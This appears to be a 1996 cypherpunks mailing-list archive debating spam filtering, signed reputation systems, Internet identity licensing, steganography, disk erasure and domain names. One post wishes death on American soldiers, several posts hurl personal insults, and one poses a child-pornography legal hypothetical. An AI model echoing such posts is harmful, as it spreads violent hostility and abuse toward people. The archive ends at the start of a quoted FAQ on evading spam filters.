Robotics and Rockwell International are planning new modems with >>speeds up to 56 kbps a second, almost double the speed of the fastest >>rate now available. The new devices should be available by the end of >>the year, although their top speed initially may be less than 56 kbps. >>(Wall Street Journal 12 Sep 96 B11) > >People who seemed to know used to say that 'the Shannon limit' >set an absolute upper limit around 40 kbps. Has Shannon been >proven wrong, or what? > >Asgaard I imagine that both modems in a connection become phase locked with the underlying 8K digital carrier. Then each modem signal element is carried by just one 8 bit digital sample. That carrier moves 8 bit bytes 8000 times per second. Stopping at 56 Kb instead of 64Kb means that a 7 bit DA converter for the sending modem and a 7 bit AD converter in the receiver, plus some fancy analog filters to undo the subscriber loop effects. Going for 64Kb would require twice the signal to noise ratio on the local loops. I think that modern PBXs have a digital link to the phone company. This would mean that an ISP would not have to buy fancy modems. A modified PBX could transmit and receive bits to a computer directly. It will impact the phone compnany's ISDN service but I don't think that they can stop this. From mpd at netcom.com Fri Sep 13 21:23:06 1996 From: mpd at netcom.com (Mike Duvos) Date: Sat, 14 Sep 1996 12:23:06 +0800 Subject: Internet Drivers' Licenses Message-ID: <199609140150.SAA09043@netcom15.netcom.com> Black Unicorn writes: > I'm crushed. > Seriously, what is the import of the "real identifiable > human" or the "posting under their legal names" point? It's been a bad spam day. If someone offered me a switch that would separate academicians from AOLers, I would throw it. That doesn't necessarily mean I would leave it in the "ON" position forever, or that I would consider such a thing to be the correct Cypherpunks approach to the problem. > If an AI program posts quality stuff, what's the difference? > Why the import of true "legal" names? Why not simply > develop reputation signatures? > The concept that "legal names" are some how a credential is > silly. I have a friend who has four, with matching SSN > cards. These are all good points, but today (as opposed to days when I am in a good mood, and think correct political thoughts), I would opt for the quick and dirty solution. > What your suggestion basically says is "instead of > developing our own decentralized reputations system for > filtering lets use one already in place, i.e. the state > Department of Motor Vehicles. Let's develop our own decentralized reputations system for filtering. Could we have it installed in the "sci" and "comp" hierarchies by tomorrow morning please? > Mr. Duvos' idea is, in my view, a step backwards. Mr. Duvos, like other humans with Net fatigue, is occasionally not in good humour. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From dlv at bwalk.dm.com Fri Sep 13 22:06:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 13:06:08 +0800 Subject: unwanted mail..what can I do? In-Reply-To: <960913194609_522174372@emout17.mail.aol.com> Message-ID: AwakenToMe at aol.com writes: > I recieved mail from netfree.com.. > I tried mailing it back (it def. had a forged address, but I got the netfree > from the mail header.....) > So anyway..... I tried sending to root at netfree....my mail was rejected (not > unknown ...it was rejected by the system) said it wasnt authorized... so I > tried support at netfree...same thing. > It ISSSSS rather annoying...any sugestions? Yes, a bunch of them: 1. Get a life. Learn to delete unwanted e-mail. Get a real shell account. 2. Ask AOL to let its users decide what e-mail to reject automatically (like procmail). They've been promising this capability by the end of September. Then you can set up your account to get no more e-mail from netfree. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Sep 13 22:13:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 13:13:17 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: <32399C94.23FD@gte.net> Message-ID: Dale Thorn writes: > First of all, soldiers are just the little guys, like you and me, no > more "Nazis" than "Communists" or whatever we Americans are in the eyes > of the third world, etc. Nazi POWs were Nazis and deserved to be killed. Likewise, American soldiers are murderous scum. I wish Saddam Hussein the best of luck in killing every American he can get. P.S. Please do not cc: me. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Fri Sep 13 22:17:24 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 13:17:24 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <199609140150.SAA09043@netcom15.netcom.com> Message-ID: <4c78TD30w165w@bwalk.dm.com> mpd at netcom.com (Mike Duvos) writes: > Let's develop our own decentralized reputations system for > filtering. Could we have it installed in the "sci" and "comp" > hierarchies by tomorrow morning please? I've been issuing NoCeM notices for off-topic traffic in several Usenet newsgroups. (Not in the last few days because we get the Usenet feed from panix.com, who's been hit with the SYN attack and stopped sending us news.) Look at the existing technology - it works pretty well. All you need is more people issuing notices about what's worth reading and what's not in more newsgroups. Then you can pick and choose whose notices to honor. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From ddfr at best.com Fri Sep 13 22:17:38 1996 From: ddfr at best.com (david friedman) Date: Sat, 14 Sep 1996 13:17:38 +0800 Subject: [RANT] Giving Mind Control Drugs to Children Message-ID: > If they were teaching anything, I bet the kid _would_ sit still. >I sure would have been a lot less distracted. Or, as Adam Smith put it: "but after twelve or thirteen years of age, provided the master does his duty, force or restraint can scarce ever be necessary to carry on any part of education." and "No discipline is ever requisite to force attendance upon lectures which are really worth the attending, as is well known wherever such lectures are given." David Friedman P.S. sorry to be so late--I just came across this post. From wombat at mcfeely.bsfs.org Fri Sep 13 22:49:55 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Sat, 14 Sep 1996 13:49:55 +0800 Subject: Internet Drivers' Licenses In-Reply-To: Message-ID: Well, it would seem some are helping to make my point; M.Duvos is calling for government intervention, in the form of an "Internet Driver's License." There goes anonimity, which has, in general, been a "good thing" on the 'net. Here comes "big brother", to protect us from the evil anonymous spammer. Here comes more government infrastructure to enforce the LAWS that "we", as a society, have subjected ourselves to, so that "the few, the rude, the clueless" can no longer send out their anonymously sourced spam. Less freedom, more taxes. Why? Because someone out there is doing something because they "have the right", by the sole virtue of there currently being no law specifically against their particular behavior. Still on the side of the spammer, Mr. May? On Fri, 13 Sep 1996, Black Unicorn wrote: > On Fri, 13 Sep 1996, Mike Duvos wrote: > > > Bill Stewart writes: > > > > > Anybody for an Internet Driver's License? > > [Too much spam, some designed to avoid filtering by humans or machines] > > > Just being able to filter out posts from Net addresses that > > don't correspond to real identifiable humans posting under > > their legal names would be a good first step. > Am I not an identifiable human? Is Black Unicorn an AI? Would I be acceptable if I posted as JohnSmith at mcfeely.bsfs.org? > In any event, getting reputation credentials from a decentralized "web of > trust" is a much more efficient answer, especially where you can assign > your own levels of trust to each signator. > > Mr. Duvos' idea is, in my view, a step backwards. If you consider increased legislation a step backwards. How else can we determine what we, as free people, can/can't/should/shouldn't do? (Sarcasm) Of course it is a step backwards; the ability to discuss sensitive issues, and obtain information anonymously has been of great social benefit. Yet another freedom soon to be legislated away (See "Georgia, USA"). Still failing to see the cause-and-effect relationship, folks? When even some on c'punk readers are calling for manditory identification, where do you think the great unwashed position themselves? - r.w. From wombat at mcfeely.bsfs.org Fri Sep 13 22:59:23 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Sat, 14 Sep 1996 13:59:23 +0800 Subject: Internet Drivers' Licenses In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > If the situation with junk e-mail becomes much worse than it is now, > then I think we'll end up with the following scenario: > > 1. A spammer gets my name, Igor Chudov's name, and a bunch of other names > from our Usenet postings. > > 2. The spammer e-mails each one of us, offering to buy X-rated videos. > > 3. Igor Chudov reads the spam e-mail first and somehow informs my mail-sorting > 'bot that this e-mail should be junked. > > 4. If my 'bot sees the spammer's mail, it junks it. > > And I'd do the same for him if I saw it first. :-) Naturally the warning about > junk e-mail needs to be digitally signed. I suppose they could be posted in a > specially designated Usenet newsgroup. The e-mail-sorting 'bot would check > this newsgroup for signed junk-mail notices from trusted parties and junk the > matching e-mails from the incoming queue. I guess it'd have to look at the > body of the mail and not just the headers, which are easy to vary. > > > > In any event, getting reputation credentials from a decentralized "web of > > trust" is a much more efficient answer, especially where you can assign > > your own levels of trust to each signator. Nice concept, but it isn't that hard to slightly alter each message; now you've also got to determine which are "the same" messages,and which are not. Why would the headers be easier to vary than the body? Tack a few extra one-liner pieces of add copy on the end in pseudo-random order, and you've got "different" messages. How do you view this specially designed newsgroup as working? Will you need to fetch all notices on a regular basis, and use the "warnings" to sort your mail? Seems like it would take longer to alter your trust level of third parties than it would take for your "opponent" to crank up another aol trial disk ... Looks like a lot of work ahead. :) - r.w. From dlv at bwalk.dm.com Fri Sep 13 23:08:46 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 14:08:46 +0800 Subject: Internet Drivers' Licenses In-Reply-To: Message-ID: Black Unicorn writes: > Seriously, what is the import of the "real identifiable human" or the > "posting under their legal names" point? I'm sure certain parties out there would like that. > If an AI program posts quality stuff, what's the difference? Indeed, an AI program I wrote has been posting excellent stuff in alt.sci.physics.plutonium - check it out! :-) > Why the import of true "legal" names? Why not simply develop reputation > signatures? Right now I let all my incoming e-mail collect in one queue. If I were really bothered by junk e-mail, I'd set up some sort of filtering that would sort them into three classes by originator: to be deleted without reading to be read as soon as possible to be read at my leisure the default, for unknown originators, would be to be read at my leisure. > What your suggestion basically says is "instead of developing our own > decentralized reputations system for filtering lets use one already in > place, i.e. the state Department of Motor Vehicles. If the situation with junk e-mail becomes much worse than it is now, then I think we'll end up with the following scenario: 1. A spammer gets my name, Igor Chudov's name, and a bunch of other names from our Usenet postings. 2. The spammer e-mails each one of us, offering to buy X-rated videos. 3. Igor Chudov reads the spam e-mail first and somehow informs my mail-sorting 'bot that this e-mail should be junked. 4. If my 'bot sees the spammer's mail, it junks it. And I'd do the same for him if I saw it first. :-) Naturally the warning about junk e-mail needs to be digitally signed. I suppose they could be posted in a specially designated Usenet newsgroup. The e-mail-sorting 'bot would check this newsgroup for signed junk-mail notices from trusted parties and junk the matching e-mails from the incoming queue. I guess it'd have to look at the body of the mail and not just the headers, which are easy to vary. This is the kind of project cypherpunks would do if they were writing code, instead of lies and personal attacks, the way Tim May (fart) does. > In any event, getting reputation credentials from a decentralized "web of > trust" is a much more efficient answer, especially where you can assign > your own levels of trust to each signator. Yes - take a look at the NoCeM project for Usenet at http://www.cm.org. Perhaps this technology can be adapted for rating e-mail. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From lspeidel at earthlink.net Fri Sep 13 23:24:48 1996 From: lspeidel at earthlink.net (zac) Date: Sat, 14 Sep 1996 14:24:48 +0800 Subject: No Subject Message-ID: <199609140428.VAA02592@iberia.it.earthlink.net> From loki at infonex.com Fri Sep 13 23:47:23 1996 From: loki at infonex.com (Lance Cottrell) Date: Sat, 14 Sep 1996 14:47:23 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] In-Reply-To: <199609131941.NAA15578@rintintin.Colorado.EDU> Message-ID: >>At 21:50 9/11/96, Ross Wright wrote to >>cypherpunks at toad.com and remailer-operators at c2.org: >>>As I said having a website invites comments. It's like being a >>>public figure. In effect you are publishing your e-mail address. >> >> >>Interesting perspective. However, placing an email address on a web page >>is by no means an offer to take "comments" (i.e., marketing spams) on >>anything that strikes the spammer's fancy. > >How would you know what the *intent* of these other people is in placing >mailme: tags on their public pages unless you have been to the specific >pages. You speak only for yourself, yet you try to imply that you speak for >everyone on the www who has placed a mailto: tag on their pages. > I think this is exactly the point. On a given page I might have several mailto tags. One for comments on some subject, one for feedback, and one for the webmaster. I expect the person mailing me to take the time to use the correct mailbox. I created a page urging political activism, and included a mailto for all the relevant Senators and Representatives. I hardly think they are interested in this kind of spam. Trawling the web for every address you can find, then mailing them all seems very inappropriate. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From jf_avon at citenet.net Sat Sep 14 00:09:42 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Sat, 14 Sep 1996 15:09:42 +0800 Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam] Message-ID: <9609140531.AB04951@cti02.citenet.net> On 13 Sep 96 at 13:37, Admin wrote: > > >Also, I charge $500 per message. I've always liked flat fees. :-) > >------- Forwarded Message ------- > >At 21:50 9/11/96, Ross Wright wrote to > >cypherpunks at toad.com and remailer-operators at c2.org: > >Unsolicited advertising/promotional email proofread for > >$500/message! Your sending such a message to me is an explicit > >request for my services! > Inane, off-thread, unsupported weak analogous attempts at reasoned > argument received, but not read - simply deleted, for $1000/message. > Sending OR posting the above to me or a Newsgroup that I may happen > to read constitutes your accord and acceptance of the above > contract. If I must read them, the fee is $2000/message. Geeee... I am *truly* clueless with my 0.1 g of pure gold per e-mail deleted. As of today, take notice, I'm increasing my rates to 2 ounces of 99.99+ pure gold per received and deleted e-mail. jfa Jean-Francois Avon, Montreal QC Canada "One of theses centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold PGP key at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From azur at netcom.com Sat Sep 14 00:11:01 1996 From: azur at netcom.com (Steve Schear) Date: Sat, 14 Sep 1996 15:11:01 +0800 Subject: Child Porn as Thoughtcrime Message-ID: What if someone combined images now generally considered pornographic under current U.S. law, with a pressing political message. For example, a nude pre-teen holding a picket sign saying "F*** Censorship." How would the courts separate the protected speech (content) from the sexual (context)? PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From jf_avon at citenet.net Sat Sep 14 00:38:21 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Sat, 14 Sep 1996 15:38:21 +0800 Subject: Internet Drivers' Licenses Message-ID: <9609140557.AB05688@cti02.citenet.net> On 13 Sep 96 at 22:51, Rabid Wombat wrote: > When even some on c'punk readers are calling for manditory > identification, where do you think the great unwashed position > themselves? As Auric Goldfinger :) once said: Once is happenstance... Twice is coincidence... The third time is enemy action! jfa Jean-Francois Avon, Montreal QC Canada "One of theses centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold PGP key at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From mpd at netcom.com Sat Sep 14 01:21:07 1996 From: mpd at netcom.com (Mike Duvos) Date: Sat, 14 Sep 1996 16:21:07 +0800 Subject: Internet Drivers' Licenses Message-ID: <199609140644.XAA13526@netcom10.netcom.com> Rabid Wombat writes: > Well, it would seem some are helping to make my point; > M.Duvos is calling for government intervention, in the form > of an "Internet Driver's License." Nothing to do with the government. If people choose to voluntarily obtain a key with which to voluntarily sign their posts, and I set my newsreader to present only articles which correspond to keys having certain criteria, all is well and good. Anyone can still post anything they like, including unsigned articles, and the filter is at the reading end, which is where it should be. A given key could mean "I am Mike Duvos", "I am Tim May", or "I am Dorothy Denning." Or it could mean something more obscure, like "I showed my driver's license to get this key", or "10 leading Cypherpunks think I'm a Nym worth listening to", or even "I donate regularly to the 700 Club." > There goes anonimity, which has, in general, been a "good > thing" on the 'net. Here comes "big brother", to protect us > from the evil anonymous spammer. Bullfeathers. Encouraging people to sign posts, and permitting newsreaders to select based on signature characteristics is about as big a threat to anonymity as a procmail file which filters out everything having an anon remailer disclaimer attached to it. > Here comes more government infrastructure to enforce the > LAWS that "we", as a society, have subjected ourselves to, > so that "the few, the rude, the clueless" can no longer send > out their anonymously sourced spam. They can spam all they want. They can be as rude and clueless as they wish. It hardly requires additional government infrastructure if *I* want to only read posts signed by keys endorsed by persons or organizations I trust. > Less freedom, more taxes. How one moves from a system of voluntarily signing Usenet posts to more taxes is beyond my ability to comprehend. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From stewarts at ix.netcom.com Sat Sep 14 03:59:54 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 14 Sep 1996 18:59:54 +0800 Subject: Erasing Disks Message-ID: <199609140915.CAA28227@dfw-ix6.ix.netcom.com> At 11:12 PM 9/11/96 -0700, you wrote: >The paper starts with the comment that most secure data destruction guides >are classified. There is the suspicion that the unclassified ones do not >cover the newer recording materials and techniques, and will not protect >you against government attackers. I disagree. The methods for declassification in the Army and Defense Department security manuals included several approaches: 1) Physical destruction - acid, sandblasters, etc. 2) NSA-Approved Whopping Big Magnets 3) NSA-Approved Hopefully-Bugfree computer programs for some computers. The most secure methods were the unclassified ones - after we sandblasted our RM05 disk packs, the NSA and KGB can't read anything. The less secure methods are the ones that require NSA approval - how strong is a Whopping Big Magnet this year? (Too strong to put near MY computer lab, thank you! :-) The answer tells you something about what the NSA can crack, which they not only don't want known, they don't want to encourage the KGB to erase their own disks better or to use the knowledge to become better at reading stolen Yankee disks. And NSA-Approved computer programs presumably have weaknesses and bugs, like all computer programs; they carry the risk that Reverse Engineers can figure out how to find the data the NSA missed. But shredding the floppy? No need to classify that, no secrets leaked by saying "Yeah, if you dissolve the magnetic film in acid we can't read anything on the etch marks in the mylar." It's Dumb and Safe (as long as you do the paperwork to make sure that you know which magtapes were fed to the shredder, which ones were overwritten with other RILLY SEKRET DATA, and which ones were stolen by the Tape Drive Repair Truck driver.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Sat Sep 14 04:17:00 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 14 Sep 1996 19:17:00 +0800 Subject: really undetectable crypto Message-ID: <199609140915.CAA28230@dfw-ix6.ix.netcom.com> At 07:26 PM 9/12/96 -0700, Jim_Miller at bilbo.suite.com wrote: >Most everybody on the list is familiar with the technique of hiding >encrypted messages in the LSBs of image files. Personally, I would not >use such a technique because don't I believe it's really undetectable. >I assume, without proof, that the LSBs of images files have statistical >properties that are sufficiently different from encrypted data that a >clever person could determine whether or not an image file contained an >imbedded encrypted message. First of all, they should at most be able to tell that there are random-looking-noise bits in there - if they start seeing patterns of ------BEGIN PGP ENCRYPTED SECRET MESSAGE------ you haven't done your job, though there are more subtle patterns that are more annoying to hide, like the slight bias of an RSA-encrypted piece of data; Hal Finney and others have written about this in the past. Hiding Depends substantially on the image source and the compression methods, if any, used on the image. For instance, a 24-bit true-color image or 8-bit grey-scale image from a scanner with 6-bit resolution will be pretty noisy in the LSBs, and if the Bad Guys are clever enough to find the patterns in them, you can be clever enough to find them and encode your initially-pseudorandom cyphertext stegobits in a way that matches the stats of the noise. On the other hand, if you take the LSBs of cartoon data, with large areas of solid colors, and start dithering them with stegobits, it's obvious you're up to something, if not necessarily what it is - be careful. Ron Rivest posted a message on coderpunks mentioning somebody's suggestion of building an internet-phone sort of program that shoves stegobits into the voice compression. I'd be extremely surprised if you could do that with the fancier compression algorithms, such as CELP, LPC, and friends, but it shouldn't be too hard with the looser compression algorithms such as ADPCM and Delta-Modulation, which need 16-32kbps and can run on really dumb processors - you've got more bits per second to hide in, can get away with stealing more of them, and there isn't any real subtle prediction stuff going on that you've got to work around. Given that most of the popular Internet Phone products don't do encryption (sigh...), this would at least be a good cover. (Well, assuming you've got a credible voice conversation going and aren't saying things like "OK, Carlos, let me send you the secret message starting ... NOW".) [tricks #1,2 - picking your cleartext so the RC4/40 cyphertext or MD5s have chunks of the real stego-cyphertext you want - cute.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Sat Sep 14 04:20:00 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 14 Sep 1996 19:20:00 +0800 Subject: Juno Newbies are Great! Message-ID: <199609140915.CAA28224@dfw-ix6.ix.netcom.com> OK, there are lots of spammers, clueless newbies, and wannabes there. There are some cool things about Juno - it's free. Anybody can get on it. Easily. Anonymously, more or less, since they don't need to have your whole credit history to be able to charge you money. At most you need a maildrop. - it's free. Anybody can get on it. Without a government. Without a bureaucracy from Washington who are Here To Help Us Provide Universal Access to the Nationalist Infotainment Infrastructure. Without telling us how to run _our_ systems. - it's free. Anybody can get on it. Anybody can try to compete. There aren't any subsidies, so there aren't any rules, except the usual "make sure you've got positive cash flow soon" and "reputation capital can sell lots of stock." - it's free. Nobody has to be on it. If you don't like the management, you can bail, with minimal investments, and go find better. - it's free. Nobody has to be on it, unlike a government-run NII that you need to pay your taxes, do your banking, register cars, keep your draft card up to date and your papers in order, and can get thrown off if they suspend your Internet Driver's License for six months. - it's free. _I_ don't have to pay for it if I don't want it. - it's free. Any newbie, spammer, or 3133T D00D can get on it, act as stupid as they want, and it's ok, because the public knows (or will soon enough) that clueless people live there and not to take any email from juno.com too seriously - it's not like mail from whitehouse.gov or kremvax.su or cnn.com that you know you'd better read and believe every word of. It's as accurate as the National Enquirer, it's the Net Of A Million Lies, and like Television, nothing to panic over. So, like, relax, chill out, and get procmail or BozoWatch or some other filter, and you not only can get rid of most of the junobots, you can use it to get rid of lots of other spam, and use that new Distributed Reputation Service Platform that Anon at juno.com is developing to find the interesting 100 messages per day of the 1000 you receive. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Sat Sep 14 04:34:26 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 14 Sep 1996 19:34:26 +0800 Subject: Domain names - Alternic - Authority Message-ID: <199609140915.CAA28221@dfw-ix6.ix.netcom.com> (The Top-Level Domain Name Wars have been breaking out in Cyberia-L, not a usual place for technical discussion, plus popping up and down in Cypherpunks. Hope y'all don't mind me mixing this to both.) Back when domain names first came in, a number of us didn't believe that a centralized organization could pull it off, especially when it was being done by a collaboration of the US military types and the European Phone Companies, who were well known to be clueless. The email world wasn't just the ARPAnet, it included all of UUCP-land, PCs were starting to occupy their spaces, and there were various DECish things and Berknets and other radically non-conformable architectures and overlapping namespaces. UUCPland worked because a few dedicated people, mainly at Bell Labs and some universities, with lots of time and non-beancounted-non-billed funds, kept track of where machines lived, phone-polled sites that couldn't afford it, tried to keep track of which of the umpty-seven machines named "bilbo" or "mozart" could talk to which others so you could occasionally get mail to someone who lived at ucbvax!allegra!mozart!zorro!bilbo!gandalf and know it was the same bilbo!gandalf you'd talked to last week and maybe get mail to people reliably across complex paths. Pathalias was a cool program that took link data and Dijkstra'd it together into a relatively connected bunch of shortest paths. The idea that Somebody Thought They Were In Charge was annoying to many of us, especially Somebody Bureaucratic. Peter Honeyman set up a bunch of his machines as the .FUN domain for a while; it was run by fun people. Rob Pike and Ken Thompson later wrote a marvelous technical rant called "The Hideous Name" about how locally-based addressing makes far more sense than global - it both reflects reality and lets the decisions about naming and such be made by the people and processes that need to make them. Well, domain names eventually became a raving success, just because it was so much easier to say where someone was (administratively, if not physically) than to guess how to get there hop-by-hop. Separating administrative addresses from routing was an important mental step. Stuff like .BITNET and .CSNET were workable, .UUCP had its real problems but eventually became sort-of-defined relative to uunet, a machine set up as a research project that had turned into a small business. One of the things that made it work well was that any given machine only had to know a manageable amount of stuff - you needed your own subdomains, a path to the top of your organization, a way to recognize that given patterns were high-level domains, and a path to the Root Servers - plus you needed somebody Higher Up to enter your name and address in their administrative database so other people could find you. It's easy to find where to look among a few hundred entries (a few technically-cooperative countries, a few zones for non-countries, and a few hundred countries that didn't really have email :-) Occasionally a country comes on board that your internal nameservers didn't recognize, and you need to get your administrator to add .nl or .kr or whatever. >From that relatively short list, which you don't need any blazingly complex database to administer, you can get anywhere. The standard DNS BIND tries to solve a bunch of complex _local_ problems and work portably in many different environments, but doesn't need to be tuned blazingly complexly to work almost anywhere. The systems that need to go beyond that are the servers for .com and to some extent .edu, which have to keep track of a lot more sites, and places that have complex internal structures or are trying to solve fancy problems like mobile users. But www.joesgarage.com doesn't need to do most of that. I think polluting the top-level domain name space is a bad move. While geographically-based names aren't a great choice for representing non-small organizations, they're short, and if you open up the entire top-level you just complicate everyone's life and in a year or two you'll have as many people carving out space at the toplevel as you currently have in .com, raising the ego levels without making the name space any bigger. Now, I suppose there's a certain nice philosophical position of being able to say "You're .gov.fr - we're .microsoft, and we're at a higher level than you!" or "You're .gov.uk - we're .gov.AnTir, and everybody in _our_ kingdom is there because they want to be!" # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From bygg at sunet.se Sat Sep 14 06:50:03 1996 From: bygg at sunet.se (Johnny Eriksson) Date: Sat, 14 Sep 1996 21:50:03 +0800 Subject: Internet Drivers' Licenses Message-ID: Mike Duvos writes: > I am now getting more junk email than email from people I > care to correspond with. It seems one can't even read the > scholarly newsgroups anymore without "Come Watch Us Lick > Ourselves on the Web" messages popping up regularly. How inappropriate. Such messages belongs in rec.pets.cats. --Johnny From dlv at bwalk.dm.com Sat Sep 14 09:11:51 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 15 Sep 1996 00:11:51 +0800 Subject: Internet Drivers' Licenses In-Reply-To: Message-ID: Rabid Wombat writes: > Well, it would seem some are helping to make my point; M.Duvos is calling > for government intervention, in the form of an "Internet Driver's License." It does not have to be the gubment. It could be a web of trust - like protocol. E.g. M.Duvos gives a pile of non-reusable, revokable cookies to people from whom he wants to receive e-mail. Every time one of them sends him an e-mail, he uses up one of his cookies. If he doesn't give me any cookies, and I want to e-mail him, I have to negotiate with someone who has a cookie and get one. Not sure how this would work with mailing lists... > There goes anonimity, which has, in general, been a "good thing" on the > 'net. Here comes "big brother", to protect us from the evil anonymous > spammer. Here comes more government infrastructure to enforce the LAWS > that "we", as a society, have subjected ourselves to, so that "the few, > the rude, the clueless" can no longer send out their anonymously sourced > spam. Less freedom, more taxes. Why? Because someone out there is doing > something because they "have the right", by the sole virtue of there > currently being no law specifically against their particular behavior. Folks who "fight spam" by forging cancels for any Usenet articles they don't like are no better than an opressive government. The infrastructure they've created for efficiently suppressing any information they don't want to be on Usenet can now be used by any government that wants to remove objectionable material from Usenet. > Still on the side of the spammer, Mr. May? The old fart is a spammer. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sat Sep 14 09:33:41 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 15 Sep 1996 00:33:41 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <199609140644.XAA13526@netcom10.netcom.com> Message-ID: mpd at netcom.com (Mike Duvos) writes: > A given key could mean "I am Mike Duvos", "I am Tim May", or "I Fart. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sat Sep 14 10:07:11 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 15 Sep 1996 01:07:11 +0800 Subject: Internet Drivers' Licenses In-Reply-To: Message-ID: Rabid Wombat writes: > (fart) H??? Kook of the Hour? > Nice concept, but it isn't that hard to slightly alter each message; now > you've also got to determine which are "the same" messages,and which are > not. Why would the headers be easier to vary than the body? Tack a few > extra one-liner pieces of add copy on the end in pseudo-random order, and > you've got "different" messages. Consider the spam currently found on Usenet. Most multi-posters repeat exactly the same text, and post it alphabetically once in each newsgroup. That's what Cantor&Siegal did originally, and that's what they recommended in their book (which by the way I highly recommend). I remember a couple of incidents before C&S when someone forged an article from "B1FF" in every newsgroup, and someone posted a warning about the second cumming of Christ in every newsgroup, and they were mildly annoying, but didn't break anything. During the C&S incident the traffic problems (Australia kicked off the net et al) were caused not by the C&S spam itself, but by the multitude of ineptly forged cancels. But I'm digressing... In every e-mail spam I've seen so far, the bodies of all the e-mails in the single spam are identical. To combat it, a trusted party could simply post the body, and the readers who trust him would discard incoming e-mails that match the body. I'm certain, however, that the spamming technology will improve. I attach at the end an interesting article that appeared anonymously about a year ago, explaining how one can multi-post essentially the same message while varying the text. > How do you view this specially designed newsgroup as working? Will you > need to fetch all notices on a regular basis, and use the "warnings" to > sort your mail? Seems like it would take longer to alter your trust level > of third parties than it would take for your "opponent" to crank up > another aol trial disk ... The way I envision this system (and I don't think we really need this yet) is: a trusted party (there may be more than one of them) posts templates saying something like: 'don't compare after \n--' (randomized signature); 'contains the string CHAG ratings in the body 3 times'; 'contains the string Received: from interramp.com in the headers once'. A reader who wants to update his database of e-mail that needs to be junked would run a program that would 1) get new articles in the filter notices newsgroup 2) look for articles digitally signed by the "raters" trusted by this reader 3) add their templates to this reader's mail filtering rules Then when the reader filters his incoming e-mail, he won't see the junk e-mail that matches the rules. Of course if the rater posts templates that are "too general" and rejects non-junk e-mail, the readers won't trust his notices anymore. If the junk mail makes it through to a reader becase the template for it hasn't yet been posted, the reader can forward it to the rater and ask him to post a template for it for other readers' benefit. Here's the old anonymous article on how to spam better: ]Subject: FAQ for Usenet Advertisers: Use Mathematical Algorithm to Avoid "Spam" ] ]Q-0. Introduction ] ]This mathematical advice is posted as an academic research study and is not a ]solicitation to act. It is a technical note and contains numerous mathematical ]algorithms and portions of pseudo-code. If you are not familiar with the 